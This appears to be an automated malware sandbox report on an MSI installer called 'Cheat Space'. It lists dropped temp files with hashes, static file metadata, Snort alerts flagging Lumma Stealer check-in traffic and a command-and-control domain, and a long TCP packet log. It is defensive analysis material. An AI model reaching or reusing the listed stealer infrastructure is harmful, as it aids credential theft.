File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.37516571576833
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau8:zTtbmkExhMJCIpErt
MD5:	4D8F3BC9B2311DA00ADB6D30EABB5449
SHA1:	5DAD677892D5FF02DF5F4FAD9F52A658237DB298
SHA-256:	FD3F968C1FC9D2ED8E07F3364626437F36875FF8B2401BAE304F5261AAC249B2
SHA-512:	C9E7B444FD986D3816C825D6A2227B9458277C92CFF63A2F4161FE71300E426EB901722E39C1060BA1AB7B3A2E7AD9AAA04C1D865EED1BB5916CF4FBE27C2DA6
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF01322D478B4EE515.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2846866844469578
Encrypted:	false
SSDEEP:	48:xMOhuJO+CFXJpT5QM7s6k3dK5SkdKAVAEkrCyEo4oxMmdKMSkdKcT7z:RhxRTDs6RpeRCwN
MD5:	4C387B6FD1BF12D02EA2BAA809CC2B2A
SHA1:	CD94A14C025895D97B3D9AC9D493FBD49F0AB52C
SHA-256:	F4C031E9DBA6737433753238E3624A71294A89D69A6150CFA4ECE39BC075BA3A
SHA-512:	6B9FA89A5A5C763772565F6301969D25DEDCA6633C18601B9D8CCEB221F1AA6EA486B61EB369D0A8F86CF3F357A8FEB70CF3ADCFCBE1269F24D0C25546E0BFE2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF043892FC9FDE2F33.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.608091976599153
Encrypted:	false
SSDEEP:	48:yi8PhZuRc06WXJ0FT5xM7s6k3dK5SkdKAVAEkrCyEo4oxMmdKMSkdKcT7z:yNhZ13FTqs6RpeRCwN
MD5:	7E58E3FAE262BFF139543549F7F60469
SHA1:	A76BE4D11E40BA7E7B20A900F1A83DE5CE64155E
SHA-256:	66ED3422B6ACDD84C41A90A02794BB18ED22070E17014EFDCE97D3B4E50197DC
SHA-512:	762E04531FAE5D7DF08CC6B480AC99885E4321E2E4150D30051E89434396D59034E05ED5C54CA3B35F8F278AEE01F0E466F13154A704401CE864A1BCFA0576BF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF283019851C66E69A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2C88FC3FA05C252B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2846866844469578
Encrypted:	false
SSDEEP:	48:xMOhuJO+CFXJpT5QM7s6k3dK5SkdKAVAEkrCyEo4oxMmdKMSkdKcT7z:RhxRTDs6RpeRCwN
MD5:	4C387B6FD1BF12D02EA2BAA809CC2B2A
SHA1:	CD94A14C025895D97B3D9AC9D493FBD49F0AB52C
SHA-256:	F4C031E9DBA6737433753238E3624A71294A89D69A6150CFA4ECE39BC075BA3A
SHA-512:	6B9FA89A5A5C763772565F6301969D25DEDCA6633C18601B9D8CCEB221F1AA6EA486B61EB369D0A8F86CF3F357A8FEB70CF3ADCFCBE1269F24D0C25546E0BFE2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4A40EB82B53A31D9.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07183361227314178
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOWcKTjPmfHgVky6lit/:2F0i8n0itFzDHFjKTLmfrit/
MD5:	F4225942A95D8BB37590CAFFD464EC3B
SHA1:	C4B8399A7F50FE4415645DD9877C192BFC64A956
SHA-256:	8BEBFFA920A27EDED1A663E0E08C15E822EEA97359DE0008179D1B9201222912
SHA-512:	FA00C51218BD3989302AB7B23B074C748A28FC9464DE9F26C54C10AEB781318CDA00DE078B0126F9403525A360527B7883162FC44A06723136503ADC17095A00
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF726971A331D413B4.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.608091976599153
Encrypted:	false
SSDEEP:	48:yi8PhZuRc06WXJ0FT5xM7s6k3dK5SkdKAVAEkrCyEo4oxMmdKMSkdKcT7z:yNhZ13FTqs6RpeRCwN
MD5:	7E58E3FAE262BFF139543549F7F60469
SHA1:	A76BE4D11E40BA7E7B20A900F1A83DE5CE64155E
SHA-256:	66ED3422B6ACDD84C41A90A02794BB18ED22070E17014EFDCE97D3B4E50197DC
SHA-512:	762E04531FAE5D7DF08CC6B480AC99885E4321E2E4150D30051E89434396D59034E05ED5C54CA3B35F8F278AEE01F0E466F13154A704401CE864A1BCFA0576BF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFAE9E8E0AFFB3AD03.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBA5455FB63ACC058.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBA73DE0A1234675F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFCD5608E8AA1C8B93.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.15266165305422402
Encrypted:	false
SSDEEP:	48:xzyT4dKMSkdKRdK5SkdKAVAEkrCyEo4oxMySp7sU:xlHpeRC1ls
MD5:	B0D8AD533F8CB98C0C68E82D6448B914
SHA1:	2F2473CD17B3059ABFB2DCABDDCF8C70E32B05B0
SHA-256:	51761495190240102C880F2197A9DDDF9A54AC928C2B7C6A5C41D598796256F8
SHA-512:	8D299331C1418AE665BA54BF141B1D9D3A9E06BF9C61C27824B07FF73E4E513DD4C7CBA3F169EA2722F362EF1F56F77A0A87D6E20E823ABAE49ED084F36A5EFF
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD8D403E47DF5BD99.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE4C6C5ED8AE862FC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2846866844469578
Encrypted:	false
SSDEEP:	48:xMOhuJO+CFXJpT5QM7s6k3dK5SkdKAVAEkrCyEo4oxMmdKMSkdKcT7z:RhxRTDs6RpeRCwN
MD5:	4C387B6FD1BF12D02EA2BAA809CC2B2A
SHA1:	CD94A14C025895D97B3D9AC9D493FBD49F0AB52C
SHA-256:	F4C031E9DBA6737433753238E3624A71294A89D69A6150CFA4ECE39BC075BA3A
SHA-512:	6B9FA89A5A5C763772565F6301969D25DEDCA6633C18601B9D8CCEB221F1AA6EA486B61EB369D0A8F86CF3F357A8FEB70CF3ADCFCBE1269F24D0C25546E0BFE2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {02E7296D-0944-4B11-A980-B679F95292AD}, Number of Words: 2, Subject: Cheat Space, Author: Cheat Space Inc., Name of Creating Application: Cheat Space, Template: ;1033, Comments: This installer database contains the logic and data required to install Cheat Space., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	6.95145463870732
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	BpOyVCAP8g.msi
File size:	3'080'192 bytes
MD5:	90598d1c212bc35849c863413566acd6
SHA1:	2249426c2283e4afd949b87849b8e24afd7a69d8
SHA256:	3fb30f154339640d180d3486573eb8133c0a61556adc6aa918c26a4e200dc90d
SHA512:	ed8c10803e5ce1aacc028daf5ce484a90a49b9c286e2ffe746e9c28dce6e806b4276807469a8dbbaa02933ac84623ac298f5ef9cb44fafe56196cf0470cd8df1
SSDEEP:	49152:Lku4o4DZKumZrzq4Fb6HXr1iWnYs4ntHurpllQ6aWuxtZmTreUuyZD6lvVz9FDVz:r4VKLFnWnjuxeTgvV5l
TLSH:	15E5BE25358AC537EB7E42706679D77A65BA7EE00FB104DBA3C82A2E1EB05C14231F17
File Content Preview:	........................>.................../...................................l.......q.......9...:...;...<...=...>...?.......................................................................5...6...7...8...9...:...;...<...=.......y......................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4172.67.154.20049743802855505 12/03/23-17:24:06.953691	TCP	2855505	ETPRO TROJAN Lumma Stealer Related Activity	49743	80	192.168.2.4	172.67.154.200
192.168.2.4172.67.154.20049743802048093 12/03/23-17:24:07.126616	TCP	2048093	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In	49743	80	192.168.2.4	172.67.154.200
192.168.2.41.1.1.149677532049418 12/03/23-17:24:06.683411	UDP	2049418	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (tirechinecarpett .pw)	49677	53	192.168.2.4	1.1.1.1
192.168.2.4172.67.136.24949742802855505 12/03/23-17:24:06.155226	TCP	2855505	ETPRO TROJAN Lumma Stealer Related Activity	49742	80	192.168.2.4	172.67.136.249

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2023 17:22:15.755419016 CET	49729	80	192.168.2.4	208.95.112.1
Dec 3, 2023 17:22:15.853652000 CET	80	49729	208.95.112.1	192.168.2.4
Dec 3, 2023 17:22:15.855331898 CET	49729	80	192.168.2.4	208.95.112.1
Dec 3, 2023 17:22:15.858342886 CET	49729	80	192.168.2.4	208.95.112.1
Dec 3, 2023 17:22:16.004404068 CET	80	49729	208.95.112.1	192.168.2.4
Dec 3, 2023 17:22:16.004477978 CET	49729	80	192.168.2.4	208.95.112.1
Dec 3, 2023 17:22:16.897910118 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.117970943 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.118146896 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.118556976 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.119869947 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.337883949 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.338247061 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.339013100 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.339096069 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.339359045 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.339428902 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.339637041 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.339704990 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.339922905 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.339975119 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.340024948 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.340078115 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.340656996 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.340711117 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.340779066 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.340827942 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.557832956 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.558018923 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.558159113 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.558232069 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.558429003 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.558489084 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.558748960 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.558808088 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.559006929 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.559021950 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.559071064 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.559079885 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.559143066 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.559492111 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.559568882 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.602272034 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.602394104 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.777134895 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.777357101 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.777708054 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.777729988 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.777767897 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.777785063 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.821892977 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.821971893 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.996315002 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.996373892 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.996603966 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.996603966 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:17.996613979 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:17.996659994 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.041054964 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.041222095 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.151344061 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.215620995 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.215640068 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.215708971 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.215778112 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.302186012 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.302299976 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.370451927 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.434946060 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.434963942 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.435087919 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.437644958 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.437644958 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.521492958 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.521509886 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.521712065 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.635718107 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:18.653881073 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.656585932 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.740484953 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.854775906 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:18.854907036 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:19.074153900 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:19.074225903 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:19.182588100 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:19.293900013 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:19.294055939 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:19.401895046 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:19.512980938 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:19.513070107 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:19.732321024 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:19.838891029 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:20.058042049 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:20.058170080 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:20.278625011 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:20.278748035 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:20.497747898 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:20.497966051 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:20.497978926 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:20.498070002 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:20.719027042 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:20.719137907 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:20.940951109 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:21.026357889 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:21.245733023 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:21.245831013 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:21.464859009 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:21.464931011 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:21.557630062 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:21.778708935 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:21.778914928 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:21.997947931 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:21.998039007 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:22.088876963 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:22.217145920 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:22.217303991 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:22.308696985 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:22.436522007 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:22.526340008 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:22.745193958 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:22.745309114 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:22.964615107 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:22.964668989 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:22.964824915 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:23.184061050 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:23.184102058 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:23.184230089 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:23.404184103 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:23.404270887 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:23.623244047 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:23.623354912 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:23.623487949 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:23.623562098 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:23.842268944 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:23.842442036 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:23.932643890 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:24.151603937 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:24.151719093 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:24.370604038 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:24.370701075 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:24.590439081 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:24.590543985 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:24.809654951 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:24.809753895 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:25.028820038 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:25.028841972 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:25.028939009 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:25.247978926 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:25.248001099 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:25.248080015 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:25.466996908 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:25.557749987 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:26.167016983 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:26.386181116 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:26.386300087 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:26.605185032 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:26.605305910 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:26.827601910 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:26.827802896 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:27.046834946 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:27.046921015 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:27.265707016 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:27.265834093 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:27.485771894 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:27.485982895 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:27.704854965 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:27.791999102 CET	49731	80	192.168.2.4	213.248.43.99
